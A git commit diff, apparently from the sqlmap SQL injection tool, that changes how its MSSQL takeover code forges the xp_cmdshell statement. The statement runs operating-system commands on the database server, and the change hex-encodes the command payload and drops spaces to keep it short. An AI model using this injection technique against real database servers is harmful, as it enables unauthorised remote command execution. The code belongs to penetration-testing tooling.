hexencoding the command is much shorter than unescaping with CHAR() for MSSQL, also no need for spaces between nested comments when forging the xp_cmdshell command to run

bdamele · bdamele · commit 18be319d1383 · 2012-07-01T23:41:10.000+01:00
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
@@ -14,6 +14,7 @@
 from lib.core.common import randomStr
 from lib.core.common import readInput
 from lib.core.common import wasLastRequestDelayed
+from lib.core.convert import hexencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
@@ -148,9 +149,9 @@ def xpCmdshellWriteFile(self, fileContent, tmpPath, randDestFile):
 
     def xpCmdshellForgeCmd(self, cmd):
         self.__randStr = randomStr(lowercase=True)
-        self.__cmd = unescaper.unescape("'%s'" % cmd)
-        self.__forgedCmd = "DECLARE @%s VARCHAR(8000); " % self.__randStr
-        self.__forgedCmd += "SET @%s = %s; " % (self.__randStr, self.__cmd)
+        self.__cmd = "0x%s" % hexencode(cmd)
+        self.__forgedCmd = "DECLARE @%s VARCHAR(8000);" % self.__randStr
+        self.__forgedCmd += "SET @%s=%s;" % (self.__randStr, self.__cmd)
         self.__forgedCmd += "EXEC %s @%s" % (self.xpCmdshellStr, self.__randStr)
 
         return self.__forgedCmd
